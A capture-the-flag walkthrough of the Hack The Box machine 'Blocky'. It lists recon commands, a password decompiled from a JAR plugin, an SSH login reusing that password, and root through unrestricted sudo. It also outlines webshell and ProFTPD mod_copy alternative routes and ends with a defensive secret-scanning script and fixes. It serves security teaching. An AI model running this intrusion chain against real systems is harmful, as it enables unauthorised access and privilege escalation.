- OS: Linux (Ubuntu 16.04)
- Domain / vhosts: none
Summary
Blocky is a Minecraft-themed, Easy-rated Linux box built around a single recurring
real-world pattern: hardcoded credentials in a compiled artifact, reused
as the system account password. The box hosts a WordPress site alongside
a live Minecraft server; the WordPress /plugins path has directory listing
enabled and exposes a custom BlockyCore.jar plugin whose Java class
contains a MySQL password in plaintext. The same password is reused for
the SSH account notch (the Minecraft creator’s username — the intended
giveaway). notch has unrestricted sudo, so a single sudo su - with the
known password completes the chain.
The teaching beats are layered: (1) gobuster with a medium wordlist
uncovers directory listings — a small wordlist misses /plugins; (2)
JAR files are ZIP archives whose class files can be decompiled without
a GUI to recover hardcoded strings; (3) the critical gotcha is that the JAR
reveals the password but not the username — the username comes from
WordPress author attribution, not the plugin code; (4) password reuse
from a service credential to a system account is the actual root cause.
Source attribution
- 0xdf, “HTB: Blocky” — https://0xdf.gitlab.io/2020/06/30/htb-blocky.html. Primary source. Covers the gobuster path, WPScan user enumeration, JAR decompilation (jd-gui and javap), SSH credential reuse, and the phpMyAdmin and FTP alternative paths.
- IppSec, “Blocky” video walkthrough — https://ippsec.rocks/?#Blocky.
Recon
nmap -p- --min-rate=5000 -oN nmap/allports.txt <TARGET>
nmap -sC -sV -p 21,22,80,25565 -oN nmap/scripts.txt <TARGET>
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp open http Apache httpd 2.4.18 (WordPress 4.8)
25565/tcp open minecraft Minecraft 1.11.2 (0/20 users)
The Minecraft server on 25565 confirms the box theme and points to a Java plugin ecosystem (Minecraft server plugins ship as JARs). ProFTPD 1.3.5a has a known mod_copy RCE (CVE-2015-3306), but it is not the intended path. WordPress 4.8 on Ubuntu 16.04 is the attack surface.
Web enumeration
The WordPress homepage shows a single post by user notch — visible in the post author byline without any scanning. WPScan confirms it:
wpscan --url http://<TARGET>/ -e ap,t,tt,u
[+] Enumerating Users
| Found By: Author Posts - Author Pattern
| Confirmed By: Login Error Messages
|
| notch, Author: notch
notch is the SSH username. This is not in the JAR; it must be found
here first.
Gobuster with a medium wordlist finds the critical directory:
gobuster dir -u http://<TARGET>/ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php -t 40
/wiki (Status: 301)
/wp-content (Status: 301)
/plugins (Status: 301) ← directory listing enabled
/phpmyadmin (Status: 301)
/wp-login.php (Status: 200)
/plugins serves a dynamic “Cute File Browser” (JavaScript-based, not Apache
directory listing). Files are listed via an AJAX call to /plugins/scan.php
and served from /plugins/files/:
curl http://blocky.htb/plugins/scan.php
# → {"name":"files","type":"folder","path":"files","items":[
# {"name":"BlockyCore.jar","path":"files/BlockyCore.jar","size":883},
# {"name":"griefprevention-1.11.2-3.1.1.298.jar",...}]}
The actual download URLs are:
http://blocky.htb/plugins/files/BlockyCore.jar
http://blocky.htb/plugins/files/griefprevention-1.11.2-3.1.1.298.jar
griefprevention is a legitimate public Minecraft Forge plugin. BlockyCore.jar
is a custom plugin written for this server — the one to examine.
Credential recovery — BlockyCore.jar decompilation
JAR files are ZIP archives. The class files inside are Java bytecode that can be decompiled back to near-source-level Java.
# Files are under /plugins/files/ (served by Cute File Browser via scan.php)
wget http://blocky.htb/plugins/files/BlockyCore.jar
With jd-gui (GUI decompiler):
jd-gui BlockyCore.jar
Navigate to com/myfirstplugin/BlockyCore.class. The constructor shows:
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
Without a GUI (command-line only):
unzip BlockyCore.jar -d BlockyCore/
javap -c BlockyCore/com/myfirstplugin/BlockyCore.class
The bytecode ldc instructions show the three hardcoded string constants:
localhost, root, and the password 8YsqfCTnvxAUeduzjNSXe22.
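The following is an added illustration of the constant-pool point, not code from the page or from either walkthrough: a small Python scanner that opens a JAR as a ZIP, walks each class file's constant pool and reports the CONSTANT_String literals that look like generated passwords, which is the check a defender would run over build artifacts before they are published. The JAR it scans is a constructed fixture built in memory (a minimal, non-loadable class whose pool holds the three literals from this page); the class path and the "12+ characters, letters plus digits" heuristic are assumptions.

```python
import io
import struct
import zipfile

# Byte widths of the fixed-size constant-pool entries, keyed by tag (JVM spec 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def string_literals(class_bytes):
    """Walk the constant pool; return every Utf8 that a CONSTANT_String entry points at."""
    assert class_bytes[:4] == b"\xca\xfe\xba\xbe", "not a .class file"
    count = struct.unpack(">H", class_bytes[8:10])[0]
    pos, idx, utf8, refs = 10, 1, {}, []
    while idx < count:
        tag, pos = class_bytes[pos], pos + 1
        if tag == 1:                                  # CONSTANT_Utf8: u2 length + bytes
            ln = struct.unpack(">H", class_bytes[pos:pos + 2])[0]
            utf8[idx] = class_bytes[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
            pos += 2 + ln
        elif tag == 8:                                # CONSTANT_String: u2 index of a Utf8
            refs.append(struct.unpack(">H", class_bytes[pos:pos + 2])[0])
            pos += 2
        else:
            pos += FIXED[tag]
        idx += 2 if tag in (5, 6) else 1              # Long/Double occupy two pool slots
    return [utf8[r] for r in refs if r in utf8]

def looks_like_secret(s):  # assumed heuristic: 12+ chars, no spaces, mixes letters and digits
    return len(s) >= 12 and " " not in s and any(c.isalpha() for c in s) and any(c.isdigit() for c in s)

def scan_jar(jar_bytes):
    """Return {class path: [suspicious literals]} for every .class in the archive."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        found = {n: [s for s in string_literals(z.read(n)) if looks_like_secret(s)]
                 for n in z.namelist() if n.endswith(".class")}
    return {n: hits for n, hits in found.items() if hits}

def build_fixture_jar(literals):
    """Constructed fixture: a JAR with one minimal class whose pool holds `literals` (not JVM-loadable)."""
    pool = b""
    for i, lit in enumerate(literals):
        raw = lit.encode("utf-8")
        pool += struct.pack(">BH", 1, len(raw)) + raw    # Utf8 in slot 2i+1
        pool += struct.pack(">BH", 8, 2 * i + 1)         # String pointing at it, in slot 2i+2
    cls = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 2 * len(literals) + 1) + pool
    cls += struct.pack(">7H", 0x21, 0, 0, 0, 0, 0, 0)    # access flags, this/super, empty tables
    with zipfile.ZipFile((buf := io.BytesIO()), "w") as z:
        z.writestr("com/myfirstplugin/BlockyCore.class", cls)
    return buf.getvalue()
```

Running scan_jar on a real plugin JAR gives the same per-class report; the fixture only exists so the block runs offline.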
Foothold — password reuse
The credential in the JAR is the MySQL database password (sqlUser = root).
The username for SSH is notch (from WordPress). The developer reused the
same password for the system account:
ssh notch@<TARGET>
# Password: 8YsqfCTnvxAUeduzjNSXe22
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),...,27(sudo),...
user.txt is at /home/notch/user.txt.
Privilege escalation — unrestricted sudo
notch@Blocky:~$ sudo -l
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
notch has completely unrestricted sudo with password. Since the password
is known:
sudo su -
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root.txt is at /root/root.txt.
Alternative paths
phpMyAdmin (/phpmyadmin): the MySQL root credential from the JAR
works at /phpmyadmin. From there, an attacker can manipulate the
WordPress database to create an admin user, install a PHP webshell as a
plugin (executing as www-data), or read/write user table entries to
obtain notch’s WordPress password hash.
ProFTPD 1.3.5a (CVE-2015-3306 / mod_copy): the SITE CPFR/SITE
CPTO commands in the mod_copy module allow unauthenticated file copying.
An attacker can copy a PHP webshell from a world-readable location into
the web root without credentials. However, notch’s password also works
directly for FTP login, making the unauth RCE unnecessary here.
Why each step worked
- Directory listing on /plugins: Apache’s Options +Indexes was not explicitly disabled for the plugins directory. When enabled, Apache serves a browseable file listing for any directory without an index file, exposing every file in that path to unauthenticated users.
- Hardcoded credentials in Java bytecode: Java class files retain all string literals from the source. A constant like sqlPass = "8YsqfCTnvxAUeduzjNSXe22" is stored verbatim in the constant pool of the .class file. Decompilers reconstruct the source from this pool with near-perfect fidelity. Credentials must never appear as string literals in source code — they belong in environment variables, vaults, or configuration files outside the distributed artifact.
- Username not in the JAR: the developer’s MySQL user is root, but the system account is notch. An attacker who tries root with the password over SSH fails and may stop there. The WordPress author attribution is the signal for the correct username.
- Password reuse across MySQL and SSH: the developer used the same string as both the MySQL root password (internal service) and the SSH account password (interactive login). Any single-point credential exposure therefore compromises both surfaces.
- (ALL : ALL) ALL sudo entry: unrestricted sudo is equivalent to root access for any user who knows the password. Combined with the known password, this is a one-command escalation.
Counterfactuals
- Disable directory listing: Options -Indexes in the Apache configuration, globally or per-directory. No web directory should be browseable unless explicitly intended.
- Never embed credentials in source code. Use environment variables, a secrets manager, or an external configuration file that is not checked into version control and not deployed to web-accessible paths.
- Do not reuse service credentials as interactive account passwords. The MySQL root password and the SSH account password should be independent secrets.
- Restrict sudo to specific commands: notch ALL=(root) /usr/bin/minecraft-start or equivalent, rather than ALL. If notch legitimately needs broad admin access, require a password (which is already enforced here, but a known password is equivalent to no password in practice after the credential is leaked).
- Remove ProFTPD’s mod_copy module if unused, or disable the SITE CPFR/SITE CPTO commands explicitly.
Key Takeaways
- Always run gobuster with a medium wordlist. The standard SecLists common.txt misses /plugins; directory-list-2.3-medium.txt finds it. The difference is 220 000 entries vs 4 600 entries.
- JAR files are just ZIP archives. unzip <file>.jar -d out/ then javap -c out/com/example/Classfile.class extracts string constants without needing a GUI decompiler. strings on the JAR also works for quick regex sweeps of the constant pool.
- WordPress post-author attribution (the byline on any post) gives you a valid username without any scan. Always read the page before running a tool.
- A credential in an application config or plugin file should always be tested against SSH and other interactive services on the same host. Password reuse from a service context to a system account is one of the most common foothold-to-user pivots on HTB.
- (ALL : ALL) ALL in sudoers with a known password means instant root. Run sudo -l immediately after foothold — it’s faster than any enumeration tool.
References
- 0xdf, “HTB: Blocky” — https://0xdf.gitlab.io/2020/06/30/htb-blocky.html
- IppSec, “Blocky” — https://ippsec.rocks/?#Blocky
- CVE-2015-3306 (ProFTPD mod_copy)